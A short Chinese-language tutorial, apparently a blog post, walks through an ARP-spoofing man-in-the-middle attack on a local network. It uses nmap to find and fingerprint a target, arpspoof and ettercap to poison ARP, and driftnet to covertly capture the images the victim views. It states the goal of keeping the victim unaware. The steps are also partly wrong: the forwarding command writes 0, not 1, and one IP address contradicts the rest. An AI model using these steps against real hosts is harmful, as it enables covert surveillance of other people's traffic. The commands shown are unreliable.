寻找目标主机
查看自己的ip地址、子网掩码等信息
ifconfig
O1D$7S619@7NGM9F(J(%WXX.png
可以看到,本机的ip地址为:192.168.75.129,网卡 eth0
接下来扫描内网中的主机:
nmap -sP 192.168.75.0/24 
YK~Q_E$4QJ{%HA({J_W8}IO.png
目标主机的ip是:192.168.75.130
我们还可以使用以下命令来查看目标主机的操作系统信息:
nmap -O 192.168.75.130
先arp欺骗,获取流量
arpspoof -i eth0 -t 192.168.75.130 192.168.75.2
2(~KF$D`8L)@B_30GX335IO.png
使用这个命令获取到从 192.168.75.130 发往 192.168.75.2(路由器)的流量。
流量被拦截,目标主机这时打不开想浏览的网页。
我们想要做的是查看目标主机在线浏览的图片,并且让目标主机察觉不到。下面进行:
开启流量转发功能
使流量经过流程为:
A->B->C
A是路由器,B是攻击住机,C是目标机
1、首先开启流量转发功能
echo 0 >> /proc/sys/net/ipv4/ip_forward
2.使用arpspoof/ettercap,选一个进行arp欺骗。获取从192.168.75.2(路由器) 到 172.17.171.130(目标机)的流量。
ettercap -T -q -M ARP /192.168.75.130///
~AO5UWF0)2A$N7YZ3H7%)JP.png
3.打开另一个终端,使用driftnet进行流量监控,显示图片
driftnet -i eth0
4H2(DAUU$TM}`N}Q4`WO_JH.png
`65CK@1{~%WCNMH5%L7`BMJ.png
